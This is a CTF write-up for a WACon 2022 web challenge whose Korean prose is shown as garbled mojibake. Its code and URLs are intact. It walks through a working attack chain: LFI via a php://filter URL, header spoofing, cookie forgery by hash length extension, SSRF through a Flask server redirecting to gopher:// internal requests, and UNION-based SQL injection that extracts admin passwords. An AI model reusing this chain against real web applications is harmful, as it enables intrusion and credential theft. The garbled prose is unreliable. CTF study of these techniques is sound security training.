๐Ÿšช Intro

20๋ช…์ด๋‚˜ ํ‘ผ ์›น ์ฒซ๋ฒˆ์งธ ๋ฌธ์ œ ์ž…๋‹ˆ๋‹ค.

๋ฌผ๋ก  ํ’€๋‹ค๊ฐ€ ํฌ๊ธฐํ•˜๊ณ , ๋Œ€ํšŒ ๋๋‚œ ์ดํ›„ ํžŒํŠธ์™€ ์นœ๊ตฌ์˜ ๋„์›€์œผ๋กœ ํ•ด๊ฒฐํ–ˆ์Šต๋‹ˆ๋‹ค.

 

ํ•ด๋‹น ๋ฌธ์ œ๋ฅผ ํ’€๊ธฐ ์œ„ํ•œ Keyword๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

`LFI`

`hash length extension attack`

`SSRF`

`SQLI`

 

 

๐Ÿ’ก Analysis - ํ™”๋ฉด ํ๋ฆ„

๋ฌธ์ œ ์‚ฌ์ดํŠธ์— ์ ‘์†ํ•˜๋ฉด ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€๋กœ ์ด๋™ ๋ฉ๋‹ˆ๋‹ค.

๋กœ๊ทธ์ธ ํ›„ "fun" ์ด๋ผ๋Š” ํŽ˜์ด์ง€๋กœ ์ด๋™ํ•˜๋ฉด ์•„๋ž˜ ์‚ฌ์ง„์ฒ˜๋Ÿผ SSRF ๋Š๋‚Œ์ด ๋‚˜๋Š” ํŽ˜์ด์ง€๊ฐ€ ์ถœ๋ ฅ๋ฉ๋‹ˆ๋‹ค.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=load

 

 

input ํƒœ๊ทธ์— ๊ฐ’์„ ์ž…๋ ฅํ•˜๋ฉด, ํ•ด๋‹น ๊ธฐ๋Šฅ์€ ๋กœ์ปฌ์—์„œ๋งŒ ๋™์ž‘ํ•˜๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ฝ”๋“œ๊ฐ€ ์—†๋Š” ์ƒํƒœ์—์„œ ์šฐํšŒํ•˜๊ธฐ์—๋Š” ํž˜๋“ค๊ธฐ ๋•Œ๋ฌธ์—, ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์„ ์ฐพ์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

 

๐Ÿ’ก Exploit - LFI

์œ„ ํŽ˜์ด์ง€์—๋Š” LFI ์ทจ์•ฝ์ ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. fun_004ded7246 ์ด๋ผ๋Š” ํŒŒ๋ผ๋ฏธํ„ฐ์— load ๋ผ๋Š” ๊ฐ’์ด ๋“ค์–ด๊ฐ€ ์žˆ์ฃ .

์ด๋Š” load.phtml ์ด๋ผ๋Š” ํŒŒ์ผ์„ `include` ํ•ด์ฃผ๋Š” ๊ฒƒ ๊ฐ™์€ ๋Š๋‚Œ์ด ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=load

 

๊ทธ๋ž˜์„œ php://filter ๋ฅผ ํ†ตํ•ด load.phtml ๊ณผ index.phtml ํŒŒ์ผ์˜ ์ฝ”๋“œ๋ฅผ leak ํ–ˆ์Šต๋‹ˆ๋‹ค.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=php://filter/convert.base64-encode/resource=/var/www/html/load

 

 

๐Ÿ’ก Exploit - ์‚ฌ์šฉ์ž ์ •์˜ ํ—ค๋”

์•„๋ž˜ ์ฝ”๋“œ๋Š” load.phtml ์ฝ”๋“œ์˜ ์ผ๋ถ€๋ถ„ ์ž…๋‹ˆ๋‹ค.

64~66๋ฒˆ์งธ ์ค„์—์„œ๋Š” ๋ญ”๊ฐ€๋ฅผ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ๋‚˜์ค‘์— ์‚ดํŽด๋ณด๋„๋ก ํ•˜์ฃ .

68๋ฒˆ์งธ ์ค„์—์„œ `HTTP_X_HTTP_HOST_OVERRIDE` ๋ผ๋Š” ํ—ค๋”์˜ ๊ฐ’์œผ๋กœ `$IP` ๋ณ€์ˆ˜์— ๋Œ€์ž…ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” 75๋ฒˆ์งธ ์ค„์— 127.0.0.1 ๊ณผ ๊ฐ™์•„์•ผ ์กฐ๊ฑด๋ฌธ ์ค‘์—์„œ ์ฒซ๋ฒˆ์งธ๋ฅผ ํ†ต๊ณผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 

 

๋”ฐ๋ผ์„œ ๋‹ค์Œ๊ณผ ๊ฐ™์ด burp๋ฅผ ํ†ตํ•ด header๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค.

์ด๋ ‡๊ฒŒ ํ•˜๋ฉด `$IP` ๋ณ€์ˆ˜์—๋Š” 127.0.0.1 ๊ฐ’์ด ๋“ค์–ด๊ฐ€๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

 

 

 

๐Ÿ’ก Exploit - Hash Length Extension Attack

64๋ฒˆ์งธ ์ค„์„ ๋ณด๋ฉด, `X-SECRET` ์— `gen()` ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ๋žœ๋คํ•œ ๊ฐ’์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋•Œ `sha1()` ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ์ƒ์„ฑ ํ›„ 20๊ธ€์ž๋ฅผ ๋ฆฌํ„ดํ•˜๊ณ  ์žˆ์ฃ .

 

66๋ฒˆ์งธ ์ค„์„ ๋ณด๋ฉด, ์œ„์—์„œ ์ƒ์„ฑ๋œ `X-SECRET` ๊ณผ "guest" ๋ผ๋Š” ๋ฌธ์ž์—ด์„ ํ•ฉ์นœ ๋’ค, `sha256()` ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ์ƒ์„ฑ๋œ ๊ฐ’์„ `X-TOKEN` ์— ๋„ฃ์Šต๋‹ˆ๋‹ค. 

 

(๋นจ๊ฐ„ ๋ฐ•์Šค 3๋ฒˆ์งธ์—์„œ) ์กฐ๊ฑด๋ฌธ ์ค‘ 2๋ฒˆ์งธ๋Š” Cookie ๋ณ€์กฐ๋ฅผ ๋ง‰๊ธฐ ์œ„ํ•œ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์ฆ์„ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋žœ๋คํ•˜๊ฒŒ ์ƒ์„ฑ๋œ `X-SECRET` ๊ณผ sha256์˜ ํ•ด์‰ฌ ์ถฉ๋Œ์„ ๊ธฐ๋Œ€ํ•  ์ˆœ ์—†๋Š” ์ƒํ™ฉ ์ž…๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ, ์ด๋Ÿฌํ•œ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์ฆ์„ ์šฐํšŒํ•˜๋Š” ๋ฐฉ๋ฒ•์ด Hash Length Extension Attack ์ด๋ผ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. 

 

 

Hask Length Extension Attack์€ ์•„๋ž˜ ๋ธ”๋กœ๊ทธ์— ์ž˜ ์„ค๋ช… ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

 

Hash Length extension attack - ๊ธธ์ด ํ™•์žฅ ๊ณต๊ฒฉ

CTF์—์„œ ํฌ๋ฆฝํ† ๊ณ„์—ด ๋ฌธ์ œ๋“ค์„ ๋ณด๋ฉด ์ด๋”ฐ๊ธˆ์”ฉ ๋“ฑ์žฅํ•˜๋Š” ๊ณต๊ฒฉ๊ธฐ๋ฒ•์ด๋‹ค. ๋”ฑํžˆ ์–ด๋ ค์šด ๊ณต๊ฒฉ๋ฒ•์€ ์•„๋‹ˆ๋‹ˆ ๊ณง๋ฐ”๋กœ ์˜ˆ์‹œ๋ฅผ ๋“ค๋ฉด์„œ ์„ค๋ช…์„ ๋“ค์–ด๊ฐ€์ž. HMAC(Hash-based Message Authentication Code) HMAC์ด ๋ญ๋ƒ๋ฉด Hash

eine.tistory.com

ํ˜„์žฌ ๋ฌธ์ œ๋ฅผ ๊ธฐ์ค€์œผ๋กœ ์„ค๋ช…ํ•˜์ž๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

1. ์ƒ์„ฑ๋œ `X-TOKEN` ๊ฐ’์„ ์•Œ๊ณ  ์žˆ๊ณ 

2. `X-SECRET` ๊ฐ’์€ ๋ชจ๋ฅด์ง€๋งŒ 20๊ธ€์ž์ž„์„ ์•Œ๊ณ  ์žˆ๊ณ 

3. `X-TOKEN` ์„ ์ƒ์„ฑํ•  ๋•Œ ๊ฐ’์„ ๋ชจ๋ฅด๋Š” `X-SECRET` ๊ณผ ์•Œ๊ณ  ์žˆ๋Š” `guest` ๋ฌธ์ž์—ด์„ ํ•ฉ์น˜๊ณ  ์žˆ๋‹ค.

 

๋ผ๋Š” ์ •๋ณด๋ฅผ ์•Œ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์œ„ ๊ณต๊ฒฉ์„ ์‚ฌ์šฉํ•˜๋ฉด, `X-SECRET` ๊ฐ’์€ ๋ชจ๋ฅด๋”๋ผ๋„ ๊ณต๊ฒฉ์ž๊ฐ€ guest ๋ฌธ์ž์—ด ๋’ค์— ๊ฐ’์„ ์ถ”๊ฐ€ํ•œ `X-TOKEN` ๊ฐ’์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ฆ‰, if ์กฐ๊ฑด๋ฌธ ์ค‘ 2๋ฒˆ์งธ์™€ 3๋ฒˆ์งธ๋ฅผ ๋™์‹œ์— ์šฐํšŒํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋˜๋Š”๊ฑฐ์ฃ .

 

์ €๋Š” ์œ„ ๋ธ”๋กœ๊ทธ์—์„œ ์„ค๋ช…ํ•œ HashPump ๋ผ๋Š” ํˆด๋กœ ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ–ˆ์Šต๋‹ˆ๋‹ค. (์„ค์น˜๋Š” ์•Œ์•„์„œ...)

 

GitHub - bwall/HashPump: A tool to exploit the hash length extension attack in various hashing algorithms

A tool to exploit the hash length extension attack in various hashing algorithms - GitHub - bwall/HashPump: A tool to exploit the hash length extension attack in various hashing algorithms

github.com

 

 

์œ„ ํˆด์„ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์˜ต์…˜์„ ๋„˜๊ฒจ์ฃผ๋ฉด, ์ƒˆ๋กญ๊ฒŒ ์ƒ์„ฑ๋œ `X-TOKEN` ๊ณผ `USER` Cookie๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

`-s`: ๊ธฐ์กด์— ์ƒ์„ฑ๋œ `X-TOKEN` ๊ฐ’ (c9bb82c11134b7e76f44c2f01383f99fe9baa691ee90c7b1c6526dce8b67355e)

`-d`: `X-TOKEN` ์ด ์ƒ์„ฑ๋  ๋•Œ, ์‚ฌ์šฉ๋˜๋Š” ์•Œ๋ ค์ง„ ๋ฐ์ดํ„ฐ (guest)

`-a`: ์ถ”๊ฐ€ํ•  ๋ฐ์ดํ„ฐ (admin)

`-k`: `X-SECRET` ๊ธธ์ด (20)

 

์œ„ ์ •๋ณด๋ฅผ Cookie์— ๋„ฃ์–ด burp๋กœ ์ „์†กํ•˜๋ฉด ์„ฑ๊ณต์ ์œผ๋กœ google ํŽ˜์ด์ง€๊ฐ€ ์ถœ๋ ฅ๋˜๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

(์ฃผ์˜ํ•  ์ ์€ ์œ„ ์ถœ๋ ฅ ๊ฐ’์€ \x00 ์œผ๋กœ ๋˜์–ด ์žˆ๋Š”๋ฐ, ์ด๋ฅผ %00 ์œผ๋กœ ๋ฐ”๊ฟ”์„œ ๋ณด๋‚ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.)

 

 

๋ฌธ์ œ์˜ ์˜๋„๋Š” google.com ์œผ๋กœ ์ ‘์†ํ•˜๋Š” ๊ฒƒ์ด ์•„๋‹ˆ๋ผ, load.phtml ์ฝ”๋“œ ์ƒ๋‹จ์— ๋‹ค๋ฅธ php ๊ฒฝ๋กœ๋ฅผ ์•Œ๋ ค์ฃผ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. 

 

 

ํ•˜์ง€๋งŒ, `valid_url()` ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด ๋‚ด๋ถ€ IP๋ฅผ ํ†ตํ•œ ์ ‘์†์„ ์ฐจ๋‹จํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋ฅผ ์šฐํšŒํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ๋‹ค์Œ ์žฅ์—์„œ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค.

 

 

๐Ÿ’ก Exploit - SSRF and gopher://

์•„๋ž˜ ์ฝ”๋“œ์—์„œ `get_data()` ํ•จ์ˆ˜์•ˆ์— curl ๊ด€๋ จ ๋™์ž‘ ์ฝ”๋“œ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.

46๋ฒˆ์งธ ์ค„์„ ๋ณด๋ฉด, `CURLOPT_FOLLOWLOCATION` ๋ผ๋Š” ์˜ต์…˜์ด on ๋˜์–ด ์žˆ๋Š”๋ฐ, ์ด๋Š” response header์— 301 ํ˜น์€ 302 ์ƒํƒœ์ฝ”๋“œ๋กœ ์ธํ•ด ๋‹ค๋ฅธ url๋กœ ์ด๋™์„ ํ—ˆ์šฉํ•œ๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ์˜ต์…˜์„ ์ด์šฉํ•˜์—ฌ `valid_url()` ํ•จ์ˆ˜๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 

 

์ €๋Š” flask๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉ ํ™˜๊ฒฝ์„ ๊ตฌ์ถ•ํ•˜์˜€์Šต๋‹ˆ๋‹ค.

์ œ ์„œ๋ฒ„๋กœ ์š”์ฒญ์ด ๋“ค์–ด์˜จ๋‹ค๋ฉด, ๋‚ด๋ถ€๋กœ ๋ฆฌ๋‹ค์ด๋ ‰ํŠธ ํ•˜๋Š” ์ฝ”๋“œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

from flask import Flask, redirect
import base64

app = Flask(__name__)    

@app.route('/chall_1')    
def chall_1():
    # challenge 1
    # request /internal_e0134cd5a917.php
    return redirect('gopher://localhost:80/_GET%20/internal_e0134cd5a917.php%20HTTP/1.0%0d%0a', code=301)

if __name__ == "__main__":    
    app.run(debug=True, host="0.0.0.0", port=8080)

์œ„ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด, /chall_1 ๋ผ๋Š” ํŽ˜์ด์ง€๋กœ ์š”์ฒญ์ด ๋“ค์–ด์˜ค๋ฉด ๋ฆฌ๋‹ค์ด๋ ‰ํŠธ๋ฅผ ์‹œํ‚ต๋‹ˆ๋‹ค. ์ด๋•Œ ๋ฆฌ๋‹ค์ด๋ ‰ํŠธ ๋˜๋Š” ์ฃผ์†Œ๋Š” gopher ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. 

 

 

์ตœ์ข…์ ์œผ๋กœ flask ์„œ๋ฒ„ ์ฃผ์†Œ๋ฅผ ๋„˜๊ธฐ๋ฉด ๋‚ด๋ถ€ IP์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ณ , ๋ฌธ์ œ ํŒŒ์ผ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

 

 

์œ„ ์‚ฌ์ง„์„ ๋ณด๋ฉด, ๋‹ค์Œ php ํŒŒ์ผ ๊ฒฝ๋กœ๋ฅผ ์•Œ๋ ค์ฃผ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

์•ž์„œ ์ž‘์„ฑํ•œ flask ์ฝ”๋“œ์— ์•„๋ž˜ ์ฝ”๋“œ๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ ๋‹ค๋ฅธ php ํŒŒ์ผ ๊ฒฝ๋กœ๋ฅผ ์ž‘์„ฑํ•ด ์ค๋‹ˆ๋‹ค.

 

์‘๋‹ต ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด Authorization header๊ฐ€ ๋น ์ ธ์žˆ๋‹ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ gopher์— ์ถ”๊ฐ€ํ•˜์—ฌ ์ „์†กํ•˜๋ฉด ๋‹ค์Œ ๋‹จ๊ณ„๋กœ ์ด๋™ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

@app.route("/chall_2")
def chall_2():
    # challenge 2 
    # add Authorization header
    return redirect("gopher://localhost:80/_GET%20/internal_1d607d2c193b.php%20HTTP/1.0%0d%0aAuthorization:%20Basic%20YWxhZGRpbjpvcGVuc2VzYW1l%0d%0a", code=301)

 

์ด๋ฒˆ์—๋Š” POST ๋ฐ์ดํ„ฐ๊ฐ€ ์—†๋‹ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค. method ์™€ content-type, body ๋ถ€๋ถ„์„ ์ฑ„์›Œ์ฃผ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

 

 

๐Ÿ’ก Exploit - SQLI

์œ„ ๊ณผ์ •์„ ํ†ต๊ณผํ•˜๋ฉด sqli ๋ฌธ์ œ๊ฐ€ ๋‚˜์˜ต๋‹ˆ๋‹ค. ์ด๋Š” Authorization ์—์„œ Injection์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ ๋‹ค์Œ๊ณผ ๊ฐ™์ด admin ๊ณ„์ •์— ๋กœ๊ทธ์ธ ํ•˜๊ณ , admin ๊ณ„์ •์˜ password๋ฅผ ์–ป์œผ๋ฉด flag๋ฅผ ํš๋“ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

@app.route("/chall_2_1")
def chall_2_1():
    # challenge 2-1
    # add POST body data

    # authentication = "admin:admin' union select 1,database(),3-- -"
    # authentication = "admin:admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='auth_user'),3-- -"
    authentication = "admin:admin' union select 1,group_concat(password),3 from auth_user limit 1-- -"
    authentication = base64.b64encode(authentication.encode('ascii')).decode()
    post_body_data = "1"
    content_type_length = len(post_body_data)

    return redirect(f"gopher://localhost:80/_POST%20/internal_1d607d2c193b.php%20HTTP/1.0%0d%0aAuthorization:%20Basic%20{authentication}%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20{content_type_length}%0d%0a%0d%0a{post_body_data}", code=301)

 

`WACon{Try_using_Gophhhher_ffabcdbc}`

'CTF' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[WACon 2022] yet_another_baby_web  (0) 2022.06.28
[WACon 2022] ppower write up  (2) 2022.06.28
zer0pts ctf 2022 GitFile Explorer write up  (0) 2022.03.27
hayyim CTF 2022 writeup  (0) 2022.02.13
HTML Viewer writeup  (0) 2022.02.04